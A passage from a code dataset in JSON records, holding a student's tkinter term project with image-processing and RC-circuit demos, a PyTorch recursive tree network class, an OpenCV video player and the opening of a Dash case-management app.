150, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 155, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects.get", "line_number": 156, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 156, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 156, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 159, "usage_type": "call"}, {"api_name": "Libraryapp.models.Books_at_library.objects.get", "line_number": 160, "usage_type": "call"}, {"api_name": "Libraryapp.models.Books_at_library.objects", "line_number": 160, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Books_at_library", "line_number": 160, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 161, "usage_type": "call"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 166, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 169, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 171, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 171, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 174, "usage_type": "call"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 175, "usage_type": "call"}, {"api_name": 
"django.http.JsonResponse", "line_number": 177, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 181, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 181, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 184, "usage_type": "name"}, {"api_name": "Libraryapp.models.Borrow.objects.all", "line_number": 186, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 186, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 186, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.BorrowSerializer", "line_number": 187, "usage_type": "name"}, {"api_name": "Libraryapp.models.Borrow.objects.get", "line_number": 201, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 201, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 201, "usage_type": "name"}, {"api_name": "Libraryapp.models.Library.objects.get", "line_number": 203, "usage_type": "call"}, {"api_name": "Libraryapp.models.Library.objects", "line_number": 203, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Library", "line_number": 203, "usage_type": "name"}, {"api_name": "Libraryapp.models.Book.objects.get", "line_number": 204, "usage_type": "call"}, {"api_name": "Libraryapp.models.Book.objects", "line_number": 204, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Book", "line_number": 204, "usage_type": "name"}, {"api_name": "Libraryapp.models.Client.objects.get", "line_number": 205, "usage_type": "call"}, {"api_name": "Libraryapp.models.Client.objects", "line_number": 205, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Client", "line_number": 205, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 211, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 214, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 216, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 216, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 219, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 223, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 223, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 226, "usage_type": "name"}, {"api_name": "Libraryapp.models.Borrow.objects.all", "line_number": 228, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 228, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 228, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.GETBorrowSerializer", "line_number": 229, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 233, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects.get", "line_number": 234, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 234, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 234, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 237, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 238, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 238, "usage_type": "name"}, 
{"api_name": "Libraryapp.utils.functions.log_print", "line_number": 241, "usage_type": "call"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 245, "usage_type": "call"}, {"api_name": "Libraryapp.models.Books_at_library.objects.get", "line_number": 246, "usage_type": "call"}, {"api_name": "Libraryapp.models.Books_at_library.objects", "line_number": 246, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Books_at_library", "line_number": 246, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 247, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 253, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 255, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 255, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 257, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 259, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 259, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 262, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 266, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 266, "usage_type": "name"}]}
+{"seq_id": "336406609", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 5 10:34:43 2021\r\n\r\n@author: 82102\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\nimport PIL\r\nimport matplotlib.pyplot as plt\r\nfrom tkinter import *\r\n\r\n\r\nclass MyInformation:\r\n\r\n \r\n def __init__(self) :\r\n self.window = Tk()\r\n self.window.title(\"개인정보\") \r\n self.window.geometry(\"750x320+700+10\")\r\n self.window.resizable(True,True)\r\n \r\n self.finishButton = Button(self.window, text = \"입력완료\", command = self.print).place(x = 0, y = 265, width = 100)\r\n self.saveButton = Button(self.window, text = \"저장\", command = self.save).place(x = 150, y = 265, width = 100)\r\n self.printButton = Button(self.window, text = \"출력\", command = self.scan).place(x = 300, y = 265, width = 100)\r\n self.RCButton = Button(self.window, text = \"RC circuit\", command = self.RC_Circuit).place(x = 450, y = 265, width = 100)\r\n self.IPButton = Button(self.window, text = \"Image processing\", command = self.Image_Processing).place(x = 600, y = 265, width = 100)\r\n \r\n self.label1 = Label(self.window, text = \"개인정보\").grid(row = 1, column = 1)\r\n self.label2 = Label(self.window, text = \"학점\").grid(row = 9, column = 1)\r\n self.label3 = Label(self.window, text = \"Image Processing\").place(x = 250, y = 0)\r\n self.label4 = Label(self.window, text = \"RC circuit\").place(x = 550, y = 0)\r\n \r\n self.label_name = Label(self.window, text = \"성명\").grid(row = 2, column = 0)\r\n self.name = StringVar()\r\n self.entry_name = Entry(self.window, width = 17, textvariable = self.name)\r\n self.entry_name.grid(row = 2, column = 1)\r\n \r\n \r\n \r\n self.label_age = Label(self.window, text = \"나이\").grid(row = 3, column = 0)\r\n self.age = StringVar()\r\n self.entry_age = Entry(self.window, width = 17, textvariable = self.age)\r\n self.entry_age.grid(row = 3, column = 1)\r\n \r\n \r\n self.label_studentNumber = Label(self.window, text = \"학번\").grid(row = 4, column = 0)\r\n self.studentNumber = StringVar()\r\n self.entry_studentNumber = Entry(self.window, width = 17, textvariable = self.studentNumber)\r\n self.entry_studentNumber.grid(row = 4, column = 1)\r\n \r\n self.label_grade = Label(self.window, text = \"학년\").grid(row = 5, column = 0)\r\n self.grade = StringVar()\r\n self.entry_grade = Entry(self.window, width = 17, textvariable = self.grade)\r\n self.entry_grade.grid(row = 5, column = 1)\r\n \r\n self.label_major = Label(self.window, text = \"전공\").grid(row = 6, column = 0)\r\n self.major = StringVar()\r\n self.entry_major = Entry(self.window, width = 17, textvariable = self.major)\r\n self.entry_major.grid(row = 6, column = 1)\r\n \r\n self.label_email = Label(self.window, text = \"email\").grid(row = 7, column = 0)\r\n self.email = StringVar()\r\n self.entry_email = Entry(self.window, width = 17, textvariable = self.email)\r\n self.entry_email.grid(row = 7, column = 1)\r\n \r\n self.label_score1 = Label(self.window, text = \"1학년\").grid(row = 10, column = 0)\r\n self.score1 = StringVar()\r\n self.entry_score1 = Entry(self.window, width = 3, textvariable = self.score1)\r\n self.entry_score1.grid(row = 10, column = 1)\r\n \r\n self.label_score2 = Label(self.window, text = \"2학년\").grid(row = 11, column = 0)\r\n self.score2 = StringVar()\r\n self.entry_score2 = Entry(self.window, width = 3, textvariable = self.score2)\r\n self.entry_score2.grid(row = 11, column = 1)\r\n \r\n self.label_score3 = Label(self.window, text = \"3학년\").grid(row = 12, column = 0)\r\n self.score3 = StringVar()\r\n 
self.entry_score3 = Entry(self.window, width = 3, textvariable = self.score3)\r\n        self.entry_score3.grid(row = 12, column = 1)\r\n        \r\n        self.label_score4 = Label(self.window, text = \"4학년\").grid(row = 13, column = 0)\r\n        self.score4 = StringVar()\r\n        self.entry_score4 = Entry(self.window, width = 3, textvariable = self.score4)\r\n        self.entry_score4.grid(row = 13, column = 1)\r\n        \r\n        self.window.mainloop()\r\n        \r\n\r\n    def print(self) :\r\n        print(\"이름 :\", self.name.get())\r\n        print(\"나이 :\", self.age.get())\r\n        print(\"학번 :\", self.studentNumber.get())\r\n        print(\"학년 :\", self.grade.get())\r\n        print(\"전공 :\", self.major.get())\r\n        print(\"email :\", self.email.get())\r\n        print(\"1학년 학점 :\", self.score1.get())\r\n        print(\"2학년 학점 :\", self.score2.get())\r\n        print(\"3학년 학점 :\", self.score3.get())\r\n        print(\"4학년 학점 :\", self.score4.get())\r\n    \r\n    def save(self) :\r\n        f = open(\"20205220_이바다.txt\", 'w')\r\n        f.write(\"{}\\n\".format(self.name.get()))\r\n        f.write(\"{}\\n\".format(self.age.get()))\r\n        f.write(\"{}\\n\".format(self.studentNumber.get()))\r\n        f.write(\"{}\\n\".format(self.grade.get()))\r\n        f.write(\"{}\\n\".format(self.major.get()))\r\n        f.write(\"{}\\n\".format(self.email.get()))\r\n        f.write(\"{}\\n\".format(self.score1.get()))\r\n        f.write(\"{}\\n\".format(self.score2.get()))\r\n        f.write(\"{}\\n\".format(self.score3.get()))\r\n        f.write(self.score4.get())\r\n        \r\n        f.close()\r\n        print(\"파일에 저장되었습니다.\")\r\n    \r\n    def scan(self) :\r\n        f = open(\"20205220_이바다.txt\", 'r')\r\n        self.entry_name.delete(0,END)\r\n        self.entry_age.delete(0,END)\r\n        self.entry_studentNumber.delete(0,END)\r\n        self.entry_grade.delete(0,END)\r\n        self.entry_major.delete(0,END)\r\n        self.entry_email.delete(0,END)\r\n        self.entry_score1.delete(0,END)\r\n        self.entry_score2.delete(0,END)\r\n        self.entry_score3.delete(0,END)\r\n        self.entry_score4.delete(0,END)\r\n\r\n        self.entry_name.insert(0, f.readline())\r\n        self.entry_age.insert(0, f.readline())\r\n        self.entry_studentNumber.insert(0, f.readline())\r\n        self.entry_grade.insert(0, f.readline())\r\n        self.entry_major.insert(0, f.readline())\r\n        self.entry_email.insert(0, f.readline())\r\n        self.entry_score1.insert(0, f.readline())\r\n        self.entry_score2.insert(0, f.readline())\r\n        self.entry_score3.insert(0, f.readline())\r\n        self.entry_score4.insert(0, f.readline())\r\n        \r\n        f.close()\r\n        \r\n\r\n    def Image_Processing(self) :\r\n        image_shape = (384, 384, 3)\r\n        working_dir = \".//\"\r\n        def lr_images(images_real, downscale) :\r\n            images = []\r\n            images.append(np.array(PIL.Image.fromarray(images_real).resize([images_real.shape[0]//downscale,images_real.shape[1]//downscale],\r\n                                resample=PIL.Image.BICUBIC)))\r\n            images_lr = np.array(images)\r\n            return images_lr \r\n        \r\n        img2 = cv2.imread(working_dir + 'Pic1.png', cv2.IMREAD_UNCHANGED)\r\n        print(\"img2\", img2)\r\n        print(\"img2 size :\", img2.size)\r\n        print(\"img2 shape :\", img2.shape)\r\n        \r\n        img3 = np.reshape(img2[:,:,:3],(384,384,3))\r\n        print(\"img3\",img3)\r\n        print(\"img3 size :\",img3.size)\r\n        print(\"img3 shape :\",img3.shape)\r\n        \r\n        img4 = lr_images(img3,4)\r\n        print(\"img4\",img4)\r\n        print(\"img4 size :\",img4.size)\r\n        print(\"img4 shape :\",img4.shape)\r\n        \r\n        figsize = (24, 10)\r\n        dim = (1, 2)\r\n        plt.figure(figsize=figsize)\r\n        plt.subplot(dim[0], dim[1], 1)\r\n        plt.imshow(img2, interpolation = 'nearest')\r\n        plt.title('Original : 384x384 ')\r\n        plt.subplot(dim[0], dim[1], 2)\r\n        plt.imshow(img4[0], interpolation = 'nearest')\r\n        plt.title('Original Low Resolution : 96x96 ')\r\n        
plt.savefig(\"o1.png\")\r\n        plt.show()\r\n        \r\n        cv2.imwrite(working_dir + 'Pic1.png', img4[0])\r\n        \r\n        img2 = cv2.imread(working_dir + 'Pic2.png', cv2.IMREAD_UNCHANGED)\r\n        print(\"img2\", img2)\r\n        print(\"img2 size :\", img2.size)\r\n        print(\"img2 shape :\", img2.shape)\r\n        \r\n        img3 = np.reshape(img2[:,:,:3],(384,384,3))\r\n        print(\"img3\",img3)\r\n        print(\"img3 size :\",img3.size)\r\n        print(\"img3 shape :\",img3.shape)\r\n        \r\n        img4 = lr_images(img3,4)\r\n        print(\"img4\",img4)\r\n        print(\"img4 size :\",img4.size)\r\n        print(\"img4 shape :\",img4.shape)\r\n        \r\n        figsize = (24, 10)\r\n        dim = (1, 2)\r\n        plt.figure(figsize=figsize)\r\n        plt.subplot(dim[0], dim[1], 1)\r\n        plt.imshow(img2, interpolation = 'nearest')\r\n        plt.title('Original : 384x384 ')\r\n        plt.subplot(dim[0], dim[1], 2)\r\n        plt.imshow(img4[0], interpolation = 'nearest')\r\n        plt.title('Original Low Resolution : 96x96 ')\r\n        plt.savefig(\"o2.png\")\r\n        plt.show()\r\n        \r\n        cv2.imwrite(working_dir + 'Pic2.png', img4[0])\r\n        \r\n        photo = cv2.imread(\"o1.png\", cv2.IMREAD_UNCHANGED)\r\n        photo_resize = cv2.resize(photo, dsize=(200, 100), interpolation=cv2.INTER_AREA)\r\n        cv2.imwrite(working_dir + 'o1.png', photo_resize)\r\n        self.photo1 = PhotoImage(file = 'o1.png')\r\n        self.photo1_label = Label(self.window, image = self.photo1).place(x = 200, y = 25)\r\n        \r\n        \r\n        photo = cv2.imread(\"o2.png\", cv2.IMREAD_UNCHANGED)\r\n        photo_resize = cv2.resize(photo, dsize=(200, 100), interpolation=cv2.INTER_AREA)\r\n        cv2.imwrite(working_dir + 'o2.png', photo_resize)\r\n        self.photo = PhotoImage(file = 'o2.png')\r\n        self.photo_label = Label(self.window, image = self.photo).place(x = 200, y = 125)\r\n        \r\n        img_destroy = 1\r\n        while img_destroy == 1 :\r\n            img_destroy = int(input(\"input 0 to clear images.\"))\r\n        else :\r\n            cv2.destroyAllWindows()\r\n        \r\n        self.window.mainloop()\r\n\r\n        \r\n    def RC_Circuit(self) :\r\n        Ydat = []\r\n        Xdat = []\r\n        Ndat = []\r\n        n_max=6000\r\n        \r\n        R = 10000\r\n        C = 0.000001\r\n        dt = 0.00001\r\n        \r\n        Ytemp =0\r\n        Xdat.append(Ytemp)\r\n        Ydat.append(Ytemp)\r\n        num = dt/R/C\r\n        for n in range(0, n_max) :\r\n            Xtemp=1\r\n            Ytemp1=Ytemp\r\n            Ytemp=(1-num)*Ytemp1+num*Xtemp\r\n            Xdat.append(n*dt)\r\n            Ydat.append(Ytemp)\r\n            Ndat.append(n)\r\n        print(Ydat)\r\n        \r\n        \r\n        \r\n        plt.figure(1)\r\n        \r\n        plt.plot(Xdat, Ydat)\r\n        plt.xlabel('Time(sec)')\r\n        plt.ylabel('VC', fontsize=20)\r\n        plt.axis([0,0.1,0,2])\r\n        plt.title(\"Step Response\")\r\n        plt.grid(True)\r\n        plt.savefig('graph.png', dpi=45)\r\n        \r\n        self.gImage = PhotoImage(file = 'graph.png')\r\n        self.label_g = Label(self.window, image = self.gImage).place(x = 450, y = 25)\r\n        self.window.mainloop()\r\n        \r\n        \r\n        \r\n        \r\nmyinformation = MyInformation()\r\n\r\n    \r\n    ", "repo_name": "lbd0/python2021", "sub_path": "20205220_이바다_termproject.py", "file_name": "20205220_이바다_termproject.py", "file_ext": "py", "file_size_in_byte": 11096, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.array", "line_number": 150, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 150, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 150, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 151, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 155, "usage_type": "call"}, {"api_name": "cv2.IMREAD_UNCHANGED", "line_number": 155, "usage_type": "attribute"}, {"api_name": 
"numpy.reshape", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 182, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 184, "usage_type": "call"}, {"api_name": "cv2.IMREAD_UNCHANGED", "line_number": 184, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 208, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 211, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 213, "usage_type": "call"}, {"api_name": "cv2.IMREAD_UNCHANGED", "line_number": 213, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 214, "usage_type": "call"}, 
{"api_name": "cv2.INTER_AREA", "line_number": 214, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 215, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 220, "usage_type": "call"}, {"api_name": "cv2.IMREAD_UNCHANGED", "line_number": 220, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 221, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 221, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 222, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 230, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 262, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 262, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 264, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 264, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 265, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 267, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 268, "usage_type": "name"}]}
+{"seq_id": "2549760212", "text": "import torch\nfrom torch import nn\n\nclass TreeNet(nn.Module):\n \"\"\"Class for recursive neural networks with n-ary tree structure.\n\n The class supports batch processing of tree-like objects with\n bounded branching factor.\n The class is intended as a base class for recursive neural networks.\n\n Given a `unit` network for processing single nodes (see note below),\n the TreeNet class returns a network capable of processing (properly\n encoded) trees.\n\n Note:\n The `unit` network specifies what should be done for each node of\n the input trees. It receives as input three parameters:\n - inputs: A Tensor containing the input features of\n the current nodes. Of shape `(batch_size, input_size)`.\n - children: A list, of size `branching_factor`, of Tensors\n containing the output features of the children of the\n current nodes.\n Each Tensor has the shape `(batch_size, output_size)`.\n If a node has less arity than the `branching_factor`,\n the features corresponding to children absent from the\n node are guaranteed to have magnitude zero.\n - arities: A LongTensor containing the arities of the nodes.\n Of shape `(batch_size,)`.\n The `unit` network should return the output features for the current\n nodes, which should be of shape `(batch_size, output_size)`.\n\n Args:\n output_size (int): Number of features output by the `unit` network.\n branching_factor (int): Largest branching factor of input trees.\n unit (torch.nn.Module): Network used for processing nodes.\n\n See Also:\n See the `treenet.encoder` module for how to encode trees and batches\n of trees.\n\n References:\n Bowman, S. R., Gauthier, J., Rastogi, A., Gupta, R.,\n Manning, C. D., & Potts, C. (2016).\n A Fast Unified Model for Parsing and Sentence Understanding.\n \"\"\"\n\n\n def __init__(self, output_size, branching_factor=2, unit=None):\n super(TreeNet, self).__init__()\n self.output_size = output_size\n self.branching_factor = branching_factor\n if unit is not None:\n self.unit = unit\n\n\n def forward(self, inputs, arities, batch_first=False):\n \"\"\"Feed the network with encoded tree-like objects.\n\n Args:\n inputs (Tensor): The features.\n Should be of shape `(time, batch_size, input_size)`.\n arities (LongTensor): The arities of the nodes.\n Should be of shape `(time, batch_size)`.\n batch_first (bool): If ``True``, then `inputs` and `arities`\n are expected to have the batch dimension first.\n\n Note:\n Inputs and arities of nodes are expected to appear in\n right-first post-order. See the `treenet.encoder`\n module for building a suitable encoder.\n\n Returns:\n Tensor: The output features,\n of shape `(batch_size, output_size)`.\n \"\"\"\n\n if batch_first:\n inputs = inputs.permute(1, 0, 2)\n arities = arities.permute(1, 0)\n\n # Time size.\n T = inputs.size(0)\n\n # Batch size.\n B = inputs.size(1)\n\n # 0, 1 .. B - 1. 
Used for indexing.\n k = arities.new(range(B))\n\n # Memory will contain the state of every node.\n memory = inputs.new_zeros(T, B, self.output_size)\n\n # The stack maintains pointers to the memory for unmerged subtrees.\n # It contains extra entries, to avoid out of bounds accesses.\n stack = arities.new_zeros(B, T + self.branching_factor)\n\n # Points to the head of the stack.\n # Starts at the given index in order to avoid out of bounds reads.\n stack_pointer = arities.new_full((B,), self.branching_factor - 1)\n\n for t in range(T):\n arity = arities[t]\n current = inputs[t]\n\n entries = []\n for i in range(self.branching_factor):\n entry = memory[stack[k, stack_pointer - i], k]\n mask = entry.new_empty(B)\n mask.copy_(arity > i)\n mask = mask.unsqueeze(1).expand(entry.size())\n entries.append(entry * mask)\n\n # Obtain the state for the node.\n new_entry = self.unit(current, entries, arity)\n\n # If multiple entries are returned, each entry must be\n # appropriately masked.\n if type(new_entry) is list or type(new_entry) is tuple:\n for i, entry in enumerate(new_entry):\n factors = entry.new_empty(B)\n factors.copy_(arity == i)\n factors = factors.unsqueeze(1).expand(entry.size())\n memory[t] = memory[t] + (entry * factors)\n else:\n memory[t] = new_entry\n\n # Update the stack pointer.\n stack_pointer.add_(-torch.abs(arity) + 1)\n\n # Ensure that the top of the stack is untouched if the arity is the\n # special value -1.\n ignore = (arity == -1).long()\n stack[k, stack_pointer] *= ignore\n stack[k, stack_pointer] += t * ((ignore + 1) % 2)\n\n # Return the content of the memory location\n # pointed by the top of the stack.\n return memory[stack[k, stack_pointer], k]\n\n", "repo_name": "epfl-lara/treenet", "sub_path": "treenet/treenet.py", "file_name": "treenet.py", "file_ext": "py", "file_size_in_byte": 5420, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 31, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn.Module", "line_number": 4, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 4, "usage_type": "name"}, {"api_name": "torch.abs", "line_number": 128, "usage_type": "call"}]}
+{"seq_id": "14904314118", "text": "import cv2\nimport numpy as np\n\nvideo = str(input(\"Input an mp4 file: \"))\ncapture = cv2.VideoCapture(video)\n\nif (capture.isOpened()==False):\n    print(\"something went wrong!!\\ntry again\")\n\nwhile(capture.isOpened()):\n\n    ret,frame=capture.read()\n    if ret==True:\n        cv2.imshow(\"Frame\",frame)\n        if cv2.waitKey(25) & 0xFF == ord(\"q\"):  # mask to the low 8 bits and quit on \"q\"\n            break\n    else:\n        break\ncapture.release()\ncv2.destroyAllWindows()", "repo_name": "Nmuhra/media-player", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 399, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.VideoCapture", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "4747727018", "text": "from app import app\nfrom bases.CasesDiv import Cases\nfrom db.CaseCalls import CaseCalls\nfrom handler.CaseHandler import CaseHandler\nfrom stemmons.Stemmons_Dash import Stemmons_Dash_App\n#from stemmons \nimport stemmons_dash_table as sdt\nfrom stemmons import stemmons_dash_components as sdc\n\nimport urllib\nimport pandas as pd\nfrom flask import request \nfrom dash.dependencies import Input, Output, State, MATCH, ALL\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash\n\nimport time\n\n\ntabs = dbc.Tabs(\n [\n dbc.Tab(label='Current', tab_id='Current'),\n dbc.Tab(label='Lifetime', tab_id='Lifetime'),\n #dbc.Tab(label='Hopper', tab_id='Hopper'),\n #dbc.Tab(label='Team', tab_id='Team'),\n #dbc.Tab(label='Relationships', tab_id='Relationships'),\n \n ],\n id='cases-tabs',\n active_tab='Current'\n \n )\n\n\ncolumns = ['Case ID', 'Case Title', 'Case Type', 'System Status', 'Due Status', 'Due Date', 'Created Date', \n 'Last Modified Date', 'Closed Date', 'Case Life Days', 'Created By', 'Assigned To', 'Owner', 'Last Modified By']\n\n\n\nlayout = html.Div([\n tabs, \n dbc.Spinner(id='content-1-cases'),\n html.Div(id='content-2-cases'),\n #dcc.Interval(id='clock-cases', max_intervals=1, interval=1),\n\n dcc.Store(id='user-cases', storage_type='memory'),\n dcc.Store(id='hopper-cases', storage_type='memory'),\n dcc.Store(id='team-cases', storage_type='memory'),\n\n # used for sharing data between callbacks\n html.Div(id='table-data', style={'display':'none'}),\n html.Div(id='filtered-data', style={'display':'none'}),\n html.Div(id='sorted-data', style={'display':'none'}),\n html.Div(id='previous-header-clicks', style={'display':'none'})\n])\n\n\n\n #user = request.cookies['user']\n #cases = Cases(user) \n\n\n@app.callback(\n Output('cases-tabs', 'children'),\n #[Input('clock-cases', 